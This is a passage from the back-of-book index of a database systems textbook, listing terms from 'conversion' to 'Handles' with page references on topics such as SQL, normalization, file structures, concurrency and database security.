conversion, 37, 41, 82, 314, 329, 333, 858, 863, 1000
converting, 17, 82, 232, 281, 314, 329, 347, 380, 441,

446, 538, 709, 713-714, 728, 1011, 1025
web pages, 1011, 1025

Copyright, 1, 548, 920
Core, 83, 1029
costs, 20, 24-25, 311, 329, 591-592, 595, 692-693,

705, 715, 717, 719, 722, 724, 726, 728,
901-902, 907, 909, 914

overhead, 24-25, 705
software engineering, 329

CPU, 43, 589-590, 598, 716, 727, 765, 769, 882,
888-889, 901

secondary storage, 589-590, 716
Crawlers, 1022, 1027
Create index, 90, 106, 671-672, 737

create unique index, 672
Creating, 4, 9, 17, 34, 38, 80, 83, 103, 106, 135, 162,

251, 268, 300, 311, 348, 372, 376, 388-389,
392, 400-401, 414, 435-436, 446-447,
493-494, 500-502, 504-505, 583, 656-657,
688, 714, 803, 911, 947, 960, 1032, 1044

forms, 268, 329, 500, 502, 583, 737
views, 83, 106, 135, 140, 414, 441, 844, 847

CROSS JOIN, 124, 158, 160, 163
Cryptography, 875
CSS, 892
Currency, 50, 886, 998
current, 3, 19, 31, 35, 40, 47, 50-51, 55, 66-67, 69,

204-205, 208, 210, 212, 236, 238, 242, 247,
262-263, 268, 278, 350-351, 353-355, 362,
369, 381, 387, 392-393, 397, 414, 462-464,
469, 479, 542, 544, 604-606, 621, 627, 659,
773, 792-793, 823-824, 874, 898, 914-915,
926, 945-951, 982, 1021

Current position, 50
Customer, 3, 24, 46, 48, 62, 114, 192-193, 196, 201,

239-240, 243-244, 286, 303, 318-319, 323,
672, 861-862, 886, 956

customers, 37, 196, 243, 311, 318, 745, 956-957
cycle, 4, 310, 313-315, 317, 334, 351, 446, 555, 768,

771, 790-791, 807, 980
cylinders, 594, 606, 608, 631, 649

D
Dangling tuple, 572, 583
Data, 1-25, 27-36, 38-42, 45-54, 55-81, 82-89, 101,

105-108, 112, 133, 147, 148-149, 163, 173,
188-189, 191-194, 196-197, 201-245, 251,
259, 268-269, 273-275, 279, 282-285, 287,
295-296, 301, 303, 310-320, 328-336,
343-348, 351-353, 355-356, 357-365, 374,
380-382, 394, 400, 404, 411, 414, 416-417,
420-430, 441, 447-448, 457-462, 465, 476,
481, 494-496, 498, 500, 502, 520-522, 528,
542-543, 551, 579, 585, 588-600, 606-607,
612, 614, 617-618, 620-630, 636-638,
640-660, 662-663, 670, 673-676, 686, 688,


705-707, 716-718, 725-727, 736-737,
739-742, 744-746, 749-752, 754-755,
759-760, 766-768, 772-774, 780-783,
794-799, 803-807, 810-814, 816, 824-825,
828-831, 841-842, 852-858, 860-865,
867-875, 877-883, 885-891, 893-895,
901-905, 909-916, 918-922, 924-927,
929-989, 991, 1008-1009, 1024-1033,
1034-1049, 1065

Double, 87, 210, 220-221, 223-224, 226-227, 382,
494-495, 588, 598, 629-630, 1052

hiding, 365, 879
Integer, 5, 9, 19, 57-58, 64, 87, 89, 211, 226, 346,

362-364, 411, 496, 600, 602, 617, 653,
774, 924, 971, 1024

integrity, 18-19, 24, 56, 64, 66, 69-77, 79, 85, 89,
107, 191, 197, 331, 355, 361, 441, 759,
868, 871, 883, 885, 973, 985, 1034

security threats, 836
Single, 5, 8, 11, 15, 20, 28, 36, 47-48, 58, 63,

65-66, 80, 87-88, 105, 133, 163, 189,
208-209, 212, 226-227, 229, 234, 251,
259, 295-296, 311, 330, 353, 400, 404,
428-430, 447, 476, 494-496, 520-522,
524, 543, 548, 593-595, 617, 623-625,
636-638, 647-649, 675, 717-718, 726,
745, 780, 816, 834, 848-849, 867, 897,
913-914, 959-960, 1022, 1028

validation, 313-314, 484, 772, 780, 794, 797-798,
805-806, 1028

Data abstraction, 8-11, 21, 28, 268-269, 275
Data communications, 42, 878, 924

trends, 42, 878
Data compression, 41, 47, 436, 675
Data cube, 1038-1039
Data cubes, 1037
Data definition language (DDL), 35, 51, 67
Data Encryption Standard (DES), 864
Data fields, 612
Data files, 9, 20, 40, 592, 598, 838
Data independence, 9-10, 21, 25, 27, 31, 33-34,

50-52, 879
Data Management Services, 46
Data manipulation language (DML), 35, 51
data mining, 23, 83, 496, 498, 867, 961-963, 982-983,

988, 1018, 1025, 1028, 1034-1036,
1045-1048

Data model, 7, 10, 19, 21, 28-30, 32-33, 47-48, 50-51,
53, 55-81, 148-149, 191-194, 197, 201,
203-204, 234, 236, 251, 285, 295-296,
315-317, 319-320, 331-332, 344-348, 351,
353, 381, 416-417, 421, 428, 430, 436, 441,
447, 457, 873, 881, 891, 957-958, 987,
1043-1044, 1047-1048, 1052

Data processing, 330, 623, 649
data security, 47, 836, 853
data sets, 623, 962
data storage, 27, 29, 32, 45, 344, 598, 674
Data structures, 6, 12, 17, 22-23, 54, 56, 75, 112, 147,

189, 364-365, 472, 487, 522, 588, 612, 614,
617, 622, 635, 648, 651, 675, 679, 688, 706,
988, 1044

data structures and, 17, 688, 988
Data transfer, 40, 481, 602, 625, 750, 902-904, 921

user, 903-904
Data transmission, 629
data type, 5, 19, 30, 57-58, 64, 72, 74, 87-89, 404,

460, 479, 600, 612, 638, 641, 945, 979,
1065

Character, 5, 57, 87-88, 429, 460, 612
Float, 64, 87, 460
Real, 57-58, 64, 87, 600, 945, 948

Data types, 3, 10, 22-23, 28, 32, 38, 48, 83-84, 87-88,
101, 106-107, 211, 347, 357, 360, 365, 374,
382, 394, 400, 411, 414, 429-430, 447, 472,
484, 494-495, 505, 600, 943, 956-957

Data warehouse, 1026, 1034-1037, 1041-1049
Data warehouses, 1, 626, 868, 1034-1037,

1041-1042, 1044-1049
Database, 1-26, 27-54, 55-81, 82-85, 91-94, 97, 99,

102-114, 115-117, 124-126, 131-134,
136-144, 147, 153, 160, 164-165, 168-169,
174, 177-178, 188, 190-200, 201-206,
209-214, 221-224, 226-228, 232-245,
252-253, 256-259, 261-264, 266-270, 273,
275-280, 282-284, 287-308, 309-356,
357-365, 367-368, 370-374, 381-382, 386,
389-396, 399-400, 402-404, 408, 411-419,
420-421, 424-425, 427, 430, 434-436,

441-453, 454-469, 471-473, 476-478,
480-481, 483-489, 490-507, 508-512, 514,
516, 520-521, 524-526, 528, 532, 542,
550-587, 597-598, 610, 621, 627, 629-630,
635, 636, 672, 679, 688, 727-728, 730-732,
733-746, 754-760, 765-767, 772-777, 789,
794, 797-801, 803-805, 836-876, 877-888,
896-898, 905, 907-908, 913-928, 936-937,
940-945, 947-948, 950-951, 953-956, 960,
962-964, 966, 968-969, 976-982, 984-990,
996-998, 1017, 1022-1024, 1029-1031,
1042-1043, 1045-1048, 1052

Database:, 72, 92, 102, 258, 447, 1045, 1064
management software, 25, 627, 907

Database administrator, 13, 310, 839, 841-842, 853,
950, 1047

database administrators, 13, 733-734, 1048
database design, 7, 13, 15-16, 18-19, 28, 30, 62, 79,

105, 201-204, 222-223, 232, 234, 236, 264,
267, 287-308, 309-356, 359, 400, 402, 413,
415, 508-510, 520-521, 524-525, 537-538,
542, 550-586, 592, 635, 733-746, 878-879,
894, 921, 1007, 1050

database management system (DBMS), 3
Database model, 204, 456-457, 480, 849
database query results, 495
Database schema, 30-31, 37, 51, 56, 66-72, 75-78,

84-85, 91, 107-111, 114, 134, 137-139,
141-144, 190-196, 199-200, 204, 214,
223-224, 227-228, 235, 238, 240, 242, 252,
261, 273, 275, 286, 287-289, 301, 305, 316,
344, 374, 394-395, 399, 402-403, 411, 413,
436, 441, 443, 448-450, 452-453, 459,
485-486, 506-507, 508, 520, 558-559, 570,
727, 731-732, 874, 927-928, 990

Database server, 40, 45-46, 311, 458, 471, 473,
480-481, 491, 501-502, 858, 892-893, 917

Database systems, 1-2, 8, 10, 17, 19, 21-22, 26, 27,
29-31, 38, 41-42, 50, 81, 188, 198, 268,
309-311, 351, 360, 362, 370, 408, 414,
416-417, 441, 500, 528, 605, 728, 730, 779,
814, 824, 848, 883-884, 886-887, 914-915,
925, 960, 982, 988, 994

connecting to, 500
database language, 454, 1065

database tables, 115, 140, 503, 846, 870
Databases, 1-26, 29, 33-34, 36-37, 46-48, 50, 53, 56,

63, 66, 75-76, 82, 105-106, 131, 198, 216,
268, 310-315, 319, 322, 330, 334-336,
344-345, 348-349, 351, 353, 355-356,
357-419, 420-421, 427, 435-436, 447,
457-458, 466, 471, 484, 493, 508-549,
559-562, 564, 567-568, 577-578, 584-585,
588-592, 622, 635, 674, 676, 679, 716-717,
747-749, 779, 785, 828-829, 835, 836-839,
856, 860, 871-876, 877-927, 940-943, 948,
950-952, 962-963, 981-984, 987-989, 998,
1021-1022, 1028-1029, 1043-1047

MySQL, 48, 106, 311, 491, 500, 746
Oracle, 33, 36-37, 106, 312, 436, 454-455, 466,

476, 491, 500, 746, 836, 869, 871-873,
875-876, 915-922, 931, 940, 955, 981,
984

PostgreSQL, 48, 106, 311
queries, 4-5, 7-8, 11, 13, 16-17, 21, 23, 26, 46, 66,

105-106, 115, 131, 149, 312, 353, 400,
402-404, 406-409, 413-415, 484, 516,
674, 716, 746, 860, 881-883, 886,
889-890, 892-894, 901-902, 905, 914,
922, 955-956, 963, 969, 982-984, 989,
996, 1034-1035, 1045-1046

queries in, 66, 115, 404, 415, 901
query language, 7, 13-14, 23, 36, 48, 149, 198,

359, 365, 380-381, 402, 413, 901, 954,
988, 1032

query results, 46, 50, 403-404, 471, 484, 892-893
querying, 3, 7, 13, 21, 37, 198, 380, 436, 447, 455,

493, 943, 951-952, 955-956, 982, 988,
1022, 1024

security of, 838, 883
SQLite, 500
support for, 48, 311, 909, 914-915, 917, 920, 955,

1008, 1045-1046
Datalog, 968, 970-974, 976-979, 982, 984, 986-987,

989
Date, 3, 8, 10, 15-16, 20, 31, 53, 67-68, 71, 77-79,

86-89, 92-93, 95, 100-101, 104, 110-111,
114, 116, 125, 135-136, 143-145, 151, 175,
179, 181, 187-188, 191-192, 197, 199-200,

205-206, 211-213, 220-223, 227-228, 230,
236, 238-239, 244, 253-254, 260, 262-264,
267, 275-276, 278-279, 288-291, 302-303,
305-308, 349, 356, 363-364, 366-367, 375,
382-383, 387, 389-393, 396, 411, 418-419,
420, 449-453, 507, 545-548, 587, 599-601,
609-610, 632, 677, 681, 731-732, 752, 792,
874, 902, 927-928, 952, 986, 1000

Date:, 228, 346, 356, 364, 366
between, 346
year, 364

date data type, 88
Dates, 88, 233, 237, 421, 490, 867, 942, 1010-1011,

1041, 1043
dBd, 549, 585
DBMS, 3-5, 7-20, 23-26, 27-28, 31, 33-52, 55, 67, 70,

73-75, 81, 85, 91, 103, 106-107, 109,
130-133, 135-137, 143, 189, 203-204, 237,
311-317, 319-320, 328-333, 340, 344,
351-353, 358, 413, 416, 436, 455-456, 461,
471, 480-482, 484, 486, 501-502, 622, 628,
673-674, 684-686, 692-693, 713, 716-717,
728, 730, 739-740, 748-750, 754-755,
757-759, 762-763, 771, 805, 810-815,
828-829, 837-840, 843-845, 858, 875,
882-885, 890, 915, 926, 929-932, 989

Deadlock, 755, 781, 787-791, 793-794, 805-807, 820,
910, 925

concurrency and, 925
detection, 788, 790, 805, 925
prevention, 788-790, 806
recovery, 755, 794, 807, 820, 910, 925

Deadlocks, 755, 792, 796, 807, 910
debugging, 465, 938
decimal, 57, 86-88, 103, 145, 354, 495
Declarations, 8, 91, 358, 368, 374, 386, 401, 411, 413,

459-460, 481
Decomposition, 322, 350, 509-510, 525, 528-530,

536-538, 541-543, 547-548, 552-553,
558-567, 570, 573-574, 576-577, 582-586,
738, 905, 907, 922, 925

Decryption, 47, 864-866
Decryption algorithm, 865
default, 65, 73-74, 87-91, 102-103, 105, 107, 123,

134, 137-139, 146, 229, 264, 268, 372, 378,
466-467, 574, 636, 737, 774, 853-854, 940

tool, 859
Default constructor, 367
Default value, 89, 91, 103
Default values, 103, 137
defining, 1-3, 8, 11, 18-19, 24, 35, 38, 56, 67, 86, 115,

134, 136-137, 139, 145, 235, 249, 251, 255,
259, 262, 266, 268, 274, 402, 581, 606, 761,
853, 918, 973, 975-976, 1029

delay, 596, 598, 625, 629, 631-632, 679, 796, 816,
1054-1056

queuing, 625
Delays, 48, 332, 591, 624, 882
deleting, 73-74, 255, 271, 328, 365, 610, 651, 654,

674, 932
files, 606, 610, 651, 674

Deletion, 35, 73, 83, 104, 107, 255, 338, 514, 520,
524, 543-544, 604-605, 607, 614-616, 619,
621, 629-630, 632-633, 635, 640-641, 651,
656, 659-660, 662, 664-665, 668, 674-675,
677, 679, 749, 1064-1065

Denial of service, 856, 858, 1027
Denial of service (DoS), 856
Dense index, 638, 645, 649, 676, 703, 741
Dependency preservation, 510, 525, 551, 558-559,

565-568, 573-574, 582-584, 586
deployment, 314, 334-336, 853, 1047, 1049

secure, 853
Descendant, 437-438, 651, 800
descending order, 102, 409, 999
design, 7, 12-16, 18-19, 22, 25, 27-28, 30, 32-34, 37,

41-43, 52, 56, 62, 64, 105, 109, 201-205,
212-214, 216, 222-224, 230, 232, 234-239,
241, 243-245, 246, 251-252, 258-259, 264,
269-270, 275-278, 283-285, 287-308,
309-356, 357-359, 399-402, 413, 415-417,
436, 508-511, 513-516, 518-521, 523-525,
528, 537-538, 540, 542-545, 550-586, 592,
626, 635, 686, 733-746, 773-774, 875,
878-879, 885-886, 894, 920-921, 926, 942,
957, 965, 981, 1027, 1042, 1044-1045,
1047-1049

of databases, 22, 246, 310, 334, 345, 348, 359,
400, 525, 885


Design process, 202, 226, 234, 236, 259, 264,
316-317, 328, 332, 348-349, 351, 353, 359,
881

desktop, 48, 282, 995, 1034-1035
Desktops, 596, 995
development, 14-15, 20, 22, 33, 42, 186, 246, 310,

312, 318-319, 329-331, 334, 343, 347-348,
351-352, 355, 425, 430, 506, 510, 583, 623,
629, 877-878, 886, 908, 937, 1006,
1032-1033, 1047

services and, 882
devices, 20, 42-43, 588-593, 597, 622, 627-629, 635,

739-740, 868
Dictionaries, 355, 746
Dictionary, 3, 37, 39, 41, 45, 237, 273, 312, 333, 363,

385-386, 388-389, 411, 414, 675, 893, 919,
1007

Dictionary encoding, 675
Difference operation, 99, 176, 703
Digital, 23, 47, 106, 590, 598, 627, 836, 839, 854-855,

866-868, 873-874, 957, 993-994, 1017, 1032
technology, 47, 590, 598, 854, 1032

digital certificate, 866-867, 874
Digital library, 1032
Digital signature, 855, 866-867
Dimension, 495, 667, 954, 1037, 1039-1042
Direct access, 29, 884
Direction, 216, 229, 249, 258, 364, 390-391, 399-401,

878, 904, 914, 956-957, 959, 965, 987, 1052
orientation, 959, 965

Directories, 631, 823-824, 919, 921-922, 1017, 1022
directory, 37, 48, 502, 617-621, 630, 633, 641, 668,

682-683, 812-813, 823-824, 829-830, 856,
883, 891, 894, 919-920, 960

Dirty data, 752
DISCONNECT, 460
Discrete cosine transform, 964
Discretionary access control (DAC), 851, 870, 872
Disjoint subclasses, 298
Disk, 17-18, 21, 29, 34, 38, 40-41, 43-45, 60, 332-333,

547, 588-635, 636-638, 640-641, 644-645,
648-649, 653, 673-677, 688-690, 692,
694-695, 698-701, 705, 715-719, 721-723,
739, 749-751, 757-759, 769, 780, 798-799,
805, 810-816, 818-826, 828-830, 833-835,
887, 913

Disk access, 40, 622-623, 717
Disk controller, 596, 625
disk drive, 547, 595-596, 624, 631
disk drives, 329, 547, 589, 591, 595-596, 598, 624,

635
disk mirroring, 624-625, 631
Disks, 29, 43, 588-598, 623-626, 629-631, 635, 740,

755, 1054-1056
Distributed database, 570, 779, 828, 862, 877-879,

881-884, 886-888, 892, 894, 901, 905, 907,
910, 913-914, 916-917, 921-924, 926

Distributed processing, 877
systems, 877

distributed systems, 311, 878, 922, 925
issues, 878, 925

Division (/), 101
division, 8, 45, 101, 160, 164-167, 175, 284, 594, 611,

1003
division by, 611, 754, 1003
document, 14, 22, 24, 49, 202, 338, 423-430, 434-448,

495, 499-500, 855-856, 964, 996-1008,
1010-1017, 1020-1021, 1023-1024,
1029-1030, 1032

Document retrieval, 997, 999-1000
document view, 444
documentation, 312, 318-319, 329, 431, 434, 915-916
documents, 22, 24, 37, 53, 84, 87, 139-140, 273, 357,

420-421, 424-425, 427-428, 435-442,
447-448, 855-856, 914, 930, 963, 965, 982,
992-999, 1001-1009, 1011-1019, 1021,
1023-1024, 1031-1032

external, 24, 1017
navigating, 998
publishing, 22, 436
recent, 273, 1032

DOM, 58-60, 64, 156, 228, 356, 578
domain, 29, 57-59, 64, 69, 72, 74, 76, 85, 89-90, 125,

149-151, 156, 161, 177, 185-190, 194,
197-198, 229, 236, 238-239, 241, 268, 298,
324, 347-348, 401, 526-527, 551, 581, 583,
721, 868, 877, 904, 915, 917-918, 968, 971,
974, 977, 979, 1022-1023, 1025-1026, 1041,
1058-1060

Domain constraints, 64, 72, 76, 581
Domain name, 89, 229
Domain names, 917
Domains, 57-60, 64, 75, 84, 87, 89, 101, 125, 132,

138, 150-151, 186-187, 189, 235, 324, 578,
702, 773, 915, 966, 971, 998, 1041-1043

dot notation, 63, 366-367, 377, 380, 386, 404
dot operator, 1058
double, 87, 182, 210, 220-221, 223-224, 226-227,

254, 261, 339, 382, 437, 467, 469-470,
477-478, 494-495, 588, 598, 610, 629-633,
698, 708, 1052

Double buffering, 588, 598, 603, 610, 629-630,
632-633, 698

Double precision, 87, 382
downstream, 319
DRAM (dynamic RAM), 590
drawing, 70, 254, 268, 297, 307, 334
Drill-down, 1039-1040, 1045
Driver, 221, 260, 300, 308, 466, 476-478
Drivers, 45, 466, 476
Drives, 43, 329, 523, 547, 589-591, 595-596, 598,

624, 628, 635
DROP, 41, 104, 131, 135, 138-140, 186, 243, 341,

553, 844, 936
DROP TABLE, 104, 138, 140
DTD, 421, 427-430, 435-436, 447-448
Dual table, 858
Duplicate values, 125, 641
duration, 276, 357, 805, 853, 943-944, 987
DVDs, 3, 589, 591, 598
Dynamic SQL, 455, 458, 465, 471
dynamic web pages, 46, 421, 490-491, 493-494, 500,

504, 892, 1018

E
eBay, 242, 311
e-commerce, 22, 285, 420, 425, 855-856, 1018, 1026
edges, 182, 230, 422, 708, 767-769, 980, 1020, 1024
editing, 331
Effective, 311, 592, 634, 868, 946-950, 985, 1032,

1048
effects, 136, 319, 756, 759, 766, 808, 829-830, 875,

894, 907, 913
Levels, 759
standard, 319

electronics, 3
Element, 5, 58, 84-85, 138, 158, 170, 212, 341, 363,

377, 384-385, 387-389, 407-409, 425-429,
431-435, 437-438, 442-446, 496-497, 503,
557, 841, 877, 953

elements, 4, 8, 20, 39, 49, 60, 64, 84-85, 117,
137-139, 156, 336, 339, 363, 377, 387-389,
405, 407-410, 424-430, 433-440, 444, 448,
495-497, 505, 629, 877, 965, 1047,
1058-1059

form, 39, 363, 409, 439, 492, 497, 1059
of array, 389, 496

else, 462, 472, 475, 482-483, 492, 608, 613, 621,
660-661, 672, 696-697, 777, 784

ELSEIF, 482-483, 696-697
Email, 494
E-mail, 43, 244, 282-283, 628, 1010, 1027
Embedded systems, 25
embedding, 83, 455-456, 459, 466, 484, 859
Employment, 57, 205, 233, 376, 380
Empty set, 212, 265
encapsulation, 22, 358, 360-361, 365, 373-374, 400,

412, 414, 628
encoding, 34, 431, 675, 997, 1042
encryption, 47, 628, 836, 838-839, 842, 855, 863-866,

871, 873-875
confidentiality and, 855
symmetric, 836, 864-865, 873-874

End tag, 423-425, 428, 434, 491
Engineering, 2, 22, 26, 29, 41, 109, 201, 235, 255,

257, 259-261, 266, 299, 314, 332, 334-335,
344, 349, 355, 372, 926, 957

Enter key, 456
Entities, 19, 29, 31-32, 50, 62, 69, 202, 205-211,

214-221, 229-230, 232, 234, 249-255,
257-261, 264-266, 269-270, 273-274, 293,
297-298, 300, 319, 325, 344, 425, 446,
513-514, 577, 592, 599, 965, 995, 1011

Entity, 7, 19, 29, 56-58, 62, 64, 69-70, 72, 74, 76-77,
81, 85, 107, 131, 201-245, 246-286, 287,
289-296, 298-304, 310, 317, 320-325, 349,
355, 394-395, 401-402, 415, 421-422, 435,
446-447, 508-509, 513, 528, 532, 539, 599,

622, 1050-1052
Entity instances, 223, 250
Entity set, 209-212, 214, 216-217, 223, 229-230, 236,

247, 280
enum, 382-383, 391, 396-398
enumerated types, 362
Enumeration, 382
Environment, 4-5, 10, 12-15, 20, 25, 27, 38, 42, 85,

237, 313, 331, 334, 337, 351, 472-473, 801,
803, 822-824, 882, 885-887, 890, 904, 909,
916, 921, 925, 927, 1044-1046

environments, 18, 34, 41-42, 473, 831, 852, 868, 885,
1032

work, 42, 852, 1032
Equijoin, 123, 162, 164, 167, 189, 294-295, 297-298,

694, 921-922
Error, 16, 19, 319, 461, 467, 501-504, 623-626, 628,

684, 774-775, 859, 881, 1004, 1043
Error correction, 1043
Error detection, 625
Error messages, 502
errors, 19, 85, 119, 284, 344, 387, 460-461, 466-467,

483-484, 502, 624, 754, 774, 867, 901
Escape character, 100, 494
establishing, 460, 466, 917
Ethernet, 628-629
Event, 133, 276, 428, 816, 841, 869, 931-932,

934-936, 938, 940-941, 944, 954-955, 981
events, 2-3, 20, 106, 131-133, 276, 329, 509, 862,

868, 930-932, 934-938, 941, 943-944, 962,
981, 1006

Excel, 2, 311, 1045
Exception, 224, 367, 384-385, 387-389, 393, 407, 427,

460-461, 467, 474, 509
Exception handling, 467
exceptions, 117, 268-269, 387, 391-392, 461, 467,

480, 774
Exchanges, 748
Exclusive lock, 795, 800, 803
EXEC SQL, 456, 459-463, 465-466, 468, 775
Execution, 17-18, 34, 39-40, 42, 137, 166, 168, 177,

183, 332, 341, 359, 371, 455, 467, 473, 502,
590-591, 598-599, 684-687, 705-708,
714-717, 724, 726, 728-730, 737, 739-740,
742-743, 748-749, 751-757, 774, 776-777,
791, 797, 810, 815-816, 818, 820, 822-824,
833-834, 857, 883, 886, 893, 902, 904-905,
907-908, 924, 936-937, 968, 983

execution:, 39, 754
Execution

out-of-order, 881
taxonomy of, 730

EXISTS, 13, 33-34, 61, 72, 74, 103, 116, 120-123,
131, 174, 180, 185, 208, 212, 214, 226,
232-234, 350, 371-372, 400-401, 408-409,
423, 428, 469, 498-499, 530, 542, 581, 598,
623, 636, 641, 688, 692-694, 702-704,
721-722, 727, 735, 768-769, 790-791

Expert system, 351, 989
exposure, 854
Expressions, 109, 116, 148, 161, 177, 179, 185-186,

191, 198, 380, 403-409, 413-414, 437-439,
706, 708, 723, 742, 989, 1007, 1011

built-in, 413-414
External sort, 729
extracting, 8, 407, 409, 436, 441, 447, 484, 1011, 1018

pages, 1011, 1018

F
Fact table, 1040-1042
Factoring, 866
Fading, 51
Failures, 18, 360, 624-625, 747-748, 754-755, 757,

760-761, 776-777, 829-832, 834, 881, 883,
912, 914, 916

FAT, 516
fault tolerance, 630, 635, 881, 995
Faults, 881-882, 962
Features, 12, 26, 28, 35, 37, 48, 50, 81, 82-84, 97,

100, 102, 105-106, 115, 131, 139, 251,
310-311, 331-332, 348, 352, 373-376,
402-403, 406, 414, 416, 471, 482-484,
493-494, 497, 623, 628, 630-631, 775,
885-886, 909, 915-916, 929-930, 957-958,
963, 965-967, 981-982, 984, 989, 1011

Federated databases, 925
Feedback, 245, 283, 315-316, 329, 774, 926,

999-1004, 1018, 1031-1032
Fields, 61, 273, 297-299, 354, 358, 410, 420, 436,


592, 600-604, 608, 610, 612, 621-622, 632,
634, 636-638, 641, 652-653, 665, 671-672,
674-675, 677-678, 692, 782-783, 801, 825,
838, 845, 1018, 1025

File, 4-5, 7-12, 15-22, 24-26, 27, 31, 34, 38, 41-44,
47-48, 56, 59-61, 85, 105, 244, 317, 330,
332-333, 344, 423-425, 428-431, 433-434,
437, 439-440, 456, 481, 491-493, 500,
588-635, 636-658, 660-661, 665, 667-668,
670-671, 673-679, 681-683, 688-695,
698-706, 709, 716-723, 725-726, 729,
734-738, 740-741, 757-758, 798-801, 804,
816, 825-826, 855, 955, 997

sequential, 592, 597, 607-611, 634, 636, 649-650,
668, 676, 679, 681-682, 757, 955, 997

file access, 10-11, 44, 633
File pointer, 604
File server, 43
File sharing, 627
file size, 725
File structures, 48, 105, 588-635, 679, 686
File system, 20, 47, 330, 430, 602
Filename, 456
files, 1, 3-5, 7-9, 11, 15-17, 19-20, 24, 29-30, 34, 38,

40-41, 43, 48, 56, 75-76, 204, 314, 332-334,
336, 350, 428, 437, 514, 523, 592, 597-602,
606, 608, 610-611, 614-615, 619, 621-622,
628-631, 633, 635, 636-680, 682-683,
684-685, 694-695, 698-702, 705-706, 709,
716-717, 720-722, 734-735, 799, 838,
902-903, 915, 921-922, 995-997

access method, 606, 630, 633, 636, 638, 650, 674
directories, 631, 921-922
disk storage, 588, 592, 597-602, 604, 606, 608,

610-611, 614-615, 619, 621-622,
628-631, 633, 635, 648, 716

field, 592, 599-602, 604, 608, 610-611, 614-615,
621-622, 629-630, 633, 636-660, 666,
668-669, 671, 673-678, 691, 716, 902

HTML, 24, 437, 491, 500
indexed sequential, 636, 649-650, 676
kinds of, 838, 995
management systems, 885
missing, 75
organization and access, 606
records, 3-5, 11, 16-17, 19, 29-30, 34, 56, 332-333,

588, 592, 597, 599-602, 604, 608,
610-611, 614-615, 619, 621-622,
629-630, 633, 635, 636-638, 640-643,
645-649, 652-658, 662, 665-668,
670-671, 673-675, 682-683, 694-695,
698-702, 716-717, 720-722, 734-735,
799, 801, 838, 902-903, 996-997

streams, 1, 600
Filtering, 524, 849-851, 859, 872-873, 1023, 1027
Filters, 690
Find Next, 605
Firewall, 842
firmware, 43
first method, 164, 235
First normal form, 61, 524, 526-528, 538, 544, 583
First-order predicate logic, 55
flag, 298-299, 587
Flash drives, 590
Flash memory, 590, 635
Flex, 892
float type, 406
Floating point numbers, 362, 382
Floating-point, 57, 87
Flow control, 836, 838-839, 861-863, 871, 873-874
FLWR expression, 439
folders, 995
, 424
Font, 423-424
fonts, 424
for attribute, 63, 84, 851
Foreign key, 69-70, 72, 74, 76, 85-86, 90-91, 105, 107,

109, 145-146, 160, 190, 289-295, 297, 300,
347-348, 435, 511, 514, 519-520, 570, 578,
721, 742, 895, 1042

Foreign key constraints, 107, 435
Form, 3, 19, 23-25, 28, 30, 36-39, 47-48, 51, 61, 63,

65, 75, 92-93, 120, 122, 130, 134, 150-151,
161, 170, 177-180, 182, 184, 186, 229, 269,
271, 273, 277, 295-296, 321, 337-338, 342,
344, 346, 348, 350-351, 362-363, 374, 378,
386, 401, 409, 420, 481-483, 490-494,
497-498, 502-503, 508-510, 524-528,
532-533, 535-538, 540-549, 551-552,

556-558, 577-578, 581-584, 599, 628,
693-694, 730, 737-738, 766-767, 892-893,
955, 961, 963-964, 969-972, 977-978,
981-984, 989, 996, 1024-1025

design a, 277, 545
Designer, 28, 229, 342, 350-351, 369, 392, 508,

542, 549, 552, 582, 737
form fields, 420
Formal language, 149, 245
Formal languages, 55, 83, 188, 996
formats, 20, 29, 273, 601, 629, 893, 993, 1017
formatting, 420, 424-425, 495, 594, 601, 993, 1037,

1044
paragraphs, 993

Forms, 3, 18, 24, 27, 36-37, 71, 155, 249, 268, 318,
329, 482, 495, 502, 509-510, 523-526, 532,
538-539, 543-544, 550-552, 558-559,
578-579, 581, 583, 586, 694, 737-738, 892,
977, 1006, 1013

Forwarding, 46
frames, 930, 964
Frameworks, 875
Frequency, 330, 334, 734, 966, 997, 1002-1003, 1005,

1008, 1012, 1025
Function, 10, 13, 17, 35, 37-38, 42, 119-120, 122,

124-126, 128-129, 140, 169-171, 176,
189-190, 212, 230, 371-372, 377-379, 406,
456, 458, 466-467, 470-485, 495, 497-500,
502-504, 551, 581, 611-617, 619-621,
633-634, 666, 668, 671-672, 675-676,
699-701, 703-704, 706, 716-718, 721-722,
729, 837-838, 866-867, 870, 918, 955, 964,
981, 1002, 1010, 1060-1063

computation of, 772
description, 10, 35, 230, 472-473, 695, 1010

Function calls, 456, 458, 466, 471-477, 484-485
function definition, 379
Functional dependency, 70, 509-510, 513, 520-522,

525, 530, 532, 535-538, 541, 543-544, 551,
553-555, 557, 559-560, 562, 565-568, 573,
575, 580-581, 583-584, 737

Functions:, 40, 470, 479, 497
in, 3-4, 13, 24-25, 27, 35, 37, 40-42, 45, 51-52,

102, 105, 119-120, 124-126, 134,
136-137, 139, 141, 149, 168-170, 177,
189, 195, 197, 243, 281, 311, 314, 342,
353-354, 360, 369-370, 372, 407, 414,
424, 455-456, 470-471, 473-474, 476,
479-482, 484-485, 497, 499-500, 581,
613-614, 620-621, 633, 716-722,
728-730, 857-861, 883, 893, 916, 921,
1048-1049, 1062-1064

point of view, 130

G
games, 3, 239
Gap, 344, 595, 630-632, 1055-1056
Garbage collection, 674, 824
Gate, 420
Gateway, 916-917
general issues, 570, 673, 676

OR, 570, 673, 676
General Motors, 924
generalization and specialization, 251, 269
Generator, 362, 388, 684-685
Generic types, 58
Genetic algorithms, 1046
Geometric objects, 372, 399
GIF, 964, 1024
Gigabit Ethernet, 629
Global variable, 499
global variables, 497, 499, 505
Glue, 981, 989
Google, 37, 914-915, 995, 1017, 1020, 1029, 1031
Google App Engine, 915
Grammar, 684
Granularity, 624-625, 750, 780, 798-801, 805-806,

853, 943-946, 949, 953-955
Graph, 182-183, 421-422, 436-437, 441, 446, 684,

705-708, 767-769, 771, 789-791, 807, 915,
957, 961, 980-981, 987

Graphics, 14, 357, 496, 498, 892, 1021, 1065
Gray, 635, 779, 807-808, 835, 964-965
> (greater than), 495
Grouping, 76, 105, 115, 124, 126-130, 137, 139-141,

143, 169-170, 177, 189, 195, 208, 409-410,
414, 514, 626, 667, 703-704, 714, 895, 943,
964, 966, 1039, 1062-1064

guidelines, 226, 264-265, 330, 332, 353, 428, 510,

520, 543-544, 733, 744-746, 854
guides, 653
GUIs (Graphical User Interfaces), 27

H

, 424

, 424
Hacking, 857
Handle, 21, 45, 48, 296, 298-299, 436, 472-475,

633-634, 667, 740, 748, 824, 829, 851,
1029, 1047

Handles, 27, 40, 46, 50, 458, 862, 892-893, 908, 916,
919

